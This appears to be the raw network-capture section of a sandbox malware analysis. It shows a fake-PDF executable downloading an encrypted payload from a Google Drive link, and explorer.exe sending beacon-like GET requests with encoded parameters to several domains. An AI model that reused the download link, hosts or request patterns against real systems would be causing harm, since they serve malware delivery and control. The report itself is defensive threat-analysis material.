                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              65192.168.11.204987535.214.4.7080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.716633081 CET11705OUTGET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:58:02.739197969 CET11705INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:58:02 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              7192.168.11.204978338.143.0.8280C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:51:45.956650972 CET8965OUTGET /be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.quanqiu55555.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:51:46.115190029 CET8966INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:51:46 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.quanqiu55555.com/be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              8192.168.11.204978554.154.44.3980C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.574671030 CET8973OUTGET /be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.mariachinuevozacatecas24-7.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.609776974 CET8974INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:51:51 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 142
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.mariachinuevozacatecas24-7.com/be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              9192.168.11.2049786148.251.15.22880C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.821810007 CET8975OUTGET /be4o/?h48Hl=hkcde7P37oUuH8w5ioFv7OuFbHOx9d6tBZcdZbqEWA6Yt+e+JSjrlFDcUKkYXgm22imD&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.antoniopasciuti.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.836203098 CET8976INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:52:01 GMT
                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                              Data Raw: 38 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 3a 28 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 09 09 62 6f 64 79 20 7b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 09 09 7d 0d 0a 0d 0a 09 09 68 31 20 20 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 35 35 35 3b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 20 30 3b 0d 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 68 32 20 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 35 35 35 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 33 30 70 78 20 30 3b 0d 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 09 09 7d 0d 0a 09 09 09 0d 0a 09 09 75 6c 20 7b 0d 0a 09 09 6c 69 73 74 2d 73 74 79 6c 65 3a 20 64 69 73 63 3b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 61 20 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 46 37 39 33 31 45 3b 0d 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 09 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 61 3a 68 6f 76 65 72 20 7b 0d 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 70 20 7b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 3b 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 23 6c 6f 67 6f 20 7b 0d 0a 09 09 77 69 64 74 68 3a 20 35 34 30 70 78 3b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 34 43 35 43 42 44 3b 0d 0a 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 25 3b 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 09 09 77 69 64 74 68 3a 20 35 34 30 70 78 3b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0d 0a 09 09 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 0d 0a 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 09 0d 0a 09 09 70 61 64 64 69 6e 67 3a 20 31 35 70 78 09 30 20 35 70 78
                                                                                                                                                                                                                              Data Ascii: 826<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /><title>Error 404 :(</title><style type="text/css">body {margin: 0;padding: 0;font-family: Arial, Helvetica, sans;font-size: 12px;color: #333;}h1 {font-size: 24px;color: #555;margin: 0 0 10px 0;padding: 0;text-align: left;font-weight: normal;}h2 {font-size: 14px;color: #555;font-weight: normal;margin: 0 0 30px 0;padding: 0;}ul {list-style: disc;margin: 0 0 20px 0;}a {font-size: 12px;color: #F7931E;text-decoration: none;}a:hover {text-decoration: underline;}p {margin: 10px 0;}#logo {width: 540px;margin: auto;font-size: 48px;color: #4C5CBD;margin-top: 5%;}#container {width: 540px;margin: auto;border-top: 1px solid #d9d9d9;border-bottom: 1px solid #d9d9d9;padding: 15px0 5px
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.836253881 CET8977INData Raw: 20 30 3b 0d 0a 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 23 66 6f 6f 74 65 72 20 7b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 35 35 35 3b 0d 0a 09 09 77 69 64 74 68 3a 20 35 34 30 70 78 3b
                                                                                                                                                                                                                              Data Ascii: 0;margin-bottom: 10px;}#footer {color: #555;width: 540px;margin: auto;text-align: right;}.orange {color: #FECC04;}</style></head><body onload="start_counter()"><div id="logo">
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.836288929 CET8977INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              0192.168.11.2049756142.250.185.174443C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              2022-02-21 15:50:16 UTC0OUTGET /uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Host: drive.google.com
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              2022-02-21 15:50:16 UTC0INHTTP/1.1 303 See Other
                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:50:16 GMT
                                                                                                                                                                                                                              Location: https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3j65rcqup1mp604v6fhecb8kek8r9nu/1645458600000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=download
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                              Content-Security-Policy: script-src 'nonce-Mw8hUujdgzgJeRRN9Xd4Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                              Server: ESF
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              1192.168.11.2049757142.250.185.161443C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3j65rcqup1mp604v6fhecb8kek8r9nu/1645458600000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=download HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Host: doc-04-08-docs.googleusercontent.com
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                                                              X-GUploader-UploadID: ADPycdtO3gmMh9pLVdxkhm-b5GQoSr8EF6szeYfEK9wOFvheqh8CJWWwC7H84ixXc3TuBBdvl1E1-YCjgxR1Uq0XEhY
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                              Content-Disposition: attachment;filename="bin_uujKagG139.bin";filename*=UTF-8''bin_uujKagG139.bin
                                                                                                                                                                                                                              Content-Length: 167488
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:50:17 GMT
                                                                                                                                                                                                                              Expires: Mon, 21 Feb 2022 15:50:17 GMT
                                                                                                                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                                                                                                                              X-Goog-Hash: crc32c=WR929g==
                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC5INData Raw: dc e7 5f 44 ab be 13 1d 11 a0 b1 b4 db a3 8f 4b 5c b6 f6 5e f8 85 aa f2 f6 5b 11 a9 75 4f 17 c3 e8 2d a5 29 49 16 50 82 1e fe 62 51 d4 13 8a d3 2e d1 67 37 e9 16 fe f5 1b 48 bf 03 d8 82 28 3d f1 9b 1f e7 46 cb 52 e7 78 a2 60 ac 99 67 ba 62 4a 7a 59 1b 25 2c 0f 58 c2 b9 c6 d5 98 a6 64 95 53 3d 4d e4 8e 0f 6c 6c 63 48 1b c5 9b bb de 8e c5 90 ae af e7 33 3e 28 8c f0 63 eb 18 97 50 aa ce a0 80 b2 47 87 9d e1 9e b9 0e 37 c4 cd 84 ac 36 4e 12 89 cf 1f 1d bd 97 3a b6 e1 17 0a b0 96 f4 40 1a f1 18 93 92 d4 6e e2 fe e1 38 fb 01 e7 ec dc f7 e1 66 aa cf 2e 79 e2 5d 51 ce 33 f2 50 0b 00 f1 3f e4 c2 5d d5 67 fe fd 40 7e e1 9f 01 e9 3f d9 2d cd 37 40 f2 ac e8 38 9c 30 b9 9b 5c 98 2e 0b aa 03 e7 dc bd c6 b7 e2 61 c1 11 53 fa 1d 33 81 ea de 5a 3e 92 84 09 8c 81 4b 2b 69
                                                                                                                                                                                                                              Data Ascii: _DK\^[uO-)IPbQ.g7H(=FRx`gbJzY%,XdS=MllcH3>(cPG76N:@n8f.y]Q3P?]g@~?-7@80\.aS3Z>K+i
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC9INData Raw: 26 61 ed 15 2a e3 50 40 03 64 90 45 1a af ac d7 f3 65 27 2c 73 58 34 58 b1 d4 b7 00 40 e3 9a f2 e1 0b 62 44 a2 d9 15 da ad d8 a5 22 7f 15 79 a9 b6 9a f7 8b c1 6d 86 8d 3f 19 04 bb 04 c4 50 c0 49 cb ac c0 4e 99 2f e8 2e ce 34 55 6a eb 35 5f e2 dd 3b d6 dd b6 5a 4d c5 50 f8 a5 d2 96 87 f0 80 13 5a be 1d 46 dc 3d bf 43 79 19 06 97 35 48 21 76 40 52 9b 8f 13 46 c5 27 80 c0 ec 79 aa 69 be e3 15 e5 b5 20 b8 59 7d e0 4a 0c 61 c4 00 30 9d 08 70 a0 df 2d 1f de 53 a4 b3 f8 80 89 10 d2 05 6a a6 6a d0 c8 82 d6 a1 69 87 0d 53 1d 5b 5c 41 07 f6 31 f1 c5 50 9c d2 c7 62 fa 2f eb bc c2 6e 7b 73 49 62 fa 62 1e ac 30 e7 ca 87 95 bf f6 73 1a 16 9a 4c 5e ac 49 8e 7a d7 1b 68 f7 27 a2 0d 64 72 59 93 2e 80 36 a3 a4 30 42 7d c3 19 0a 45 d6 ed 23 2d 91 2d 72 56 36 66 d5 70 d8 5b
                                                                                                                                                                                                                              Data Ascii: &a*P@dEe',sX4X@bD"ym?PIN/.4Uj5_;ZMPZF=Cy5H!v@RF'yi Y}Ja0p-SjjiS[\A1Pb/n{sIbb0sL^Izh'drY.60B}E#--rV6fp[
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC12INData Raw: ba f7 cc af a0 cc aa 90 f4 08 27 18 cf d1 d6 35 82 3e c9 32 3d e6 a4 b4 ef 32 50 a0 65 35 b0 af 14 89 63 81 03 19 f9 7d 83 ea 92 23 ca 4a c1 7f 17 af 6a e8 9a 50 49 8e 26 bd 60 69 4e e6 1a 87 05 a0 8c 58 67 b5 64 32 bb 2d e4 7f da bb f6 2d 3f 72 d7 86 c9 d3 f8 3e e7 8a 61 4e f2 93 93 ef c5 96 c4 5c 3e 1a 73 3a 6f ca 7a 32 82 f9 ad 44 0d 9c 14 72 d9 1e 36 07 3a f6 41 b8 cc 74 85 16 48 c8 fe d9 11 2f 3b eb 51 5e 21 7a f5 ae 32 09 a8 6c d4 20 c8 19 7c 58 9d 87 6b 3f 15 13 49 89 0e 4c 3c 83 4b 77 2d 6b 7c 54 01 a8 5a 3d db f2 87 38 9b 09 b6 16 ad 89 99 40 5e a7 31 cb 18 b6 04 53 f7 ae 48 60 0e 0c 20 cf 98 47 cf 09 b2 86 62 30 51 fa 43 35 eb 6f 0e 7d 8d fc 65 79 08 6b 21 09 71 80 e6 c5 37 e5 ce 7e 15 b1 7f 1b d8 13 c9 70 7c f8 d5 1a 15 19 b3 37 8c bd 7c 42 93
                                                                                                                                                                                                                              Data Ascii: '5>2=2Pe5c}#JjPI&`iNXgd2--?r>aN\>s:oz2Dr6:AtH/;Q^!z2l |Xk?IL<Kw-k|TZ=8@^1SH` Gb0QC5o}eyk!q7~p|7|B
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC16INData Raw: 95 8a 34 dd ea 08 ca da a0 ae eb 36 f0 5b ef d3 da 70 45 ec 49 82 4c fa cc 27 f4 5e 8f 2b 91 6a 9d 11 e4 ad 6c 59 6e f3 22 6d 50 01 93 41 c8 83 61 c9 e1 f0 03 15 00 56 16 04 f3 89 dc eb 60 29 09 05 92 2f 23 84 4d f2 84 fc 93 11 91 da a1 9a 97 bd 75 b2 c7 f8 59 0b 6e 52 07 19 46 dc 3d ee 2b 79 29 06 97 06 88 49 76 60 52 9b df 44 81 80 f3 99 75 a6 74 6d 2c 66 ce f0 9f 2a e7 fd 85 ee 29 d6 e3 a6 81 e0 90 7d 33 3d 67 9a c9 b1 f4 a6 14 74 bd 68 41 fb 69 39 ad e3 86 53 9b 1b b7 66 2c 77 1a 78 19 25 9b 04 f3 4c 46 27 e3 97 d9 2a 26 0b ee 4c 2c f9 3e 3b 5a 7f 34 a5 7f 92 e0 53 cf e6 c8 83 9d 78 73 87 e4 e9 65 5c 7e ec c9 e8 bd 52 e3 96 08 d8 b9 3b ed f7 a3 6d d1 7f 50 2a 21 ce bc 82 3c f1 05 36 d7 ed a8 dd 12 e9 66 d3 c0 13 d3 2f 86 d0 6e fc 32 4b 11 3e 31 5e 96
